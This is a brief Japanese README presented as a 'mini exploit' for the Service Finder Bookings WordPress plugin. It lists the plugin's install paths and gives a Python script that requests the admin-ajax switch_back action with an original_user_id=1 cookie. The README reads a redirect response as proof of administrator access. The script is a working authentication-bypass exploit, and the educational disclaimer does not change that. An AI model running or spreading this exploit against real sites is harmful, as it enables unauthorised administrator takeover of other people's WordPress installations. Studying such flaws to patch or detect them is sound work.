
Service Finder -BookingsプラグインWP用のミニエクスプロイト
Service Finder プラグインは、WordPress 向けの予約・サービス管理システムです。
その人気と複雑さから、一部のバージョンでは認証されていない AJAX エンドポイントや不適切なアクセス制御に関連するセキュリティ問題が発生しています。
この README は、研究者がインストール環境を安全にフィンガープリントし、倫理的な慣行に従う方法を説明するものです(dbr krk)。
/wp-content/plugins/service-finder/
/wp-content/plugins/service-finder-bookings/
/wp-content/plugins/sf-booking/
⚠️ 免責事項:
これらの検索は教育目的および研究目的のみに使用してください。不正アクセスや悪用を試みないでください。
import requests
url = "https://example.com/wp-admin/admin-ajax.php?action=service_finder_switch_back"
cookies = {
'original_user_id': '1',
}
r = requests.get(url, cookies=cookies)
print(r.status_code)
print(r.text)
300-399: ✅ 脆弱性あり!管理者として管理パネルにリダイレクト400-499: ⚠️ クライアントエラー — リクエストが無効または未承認であり、脆弱性なし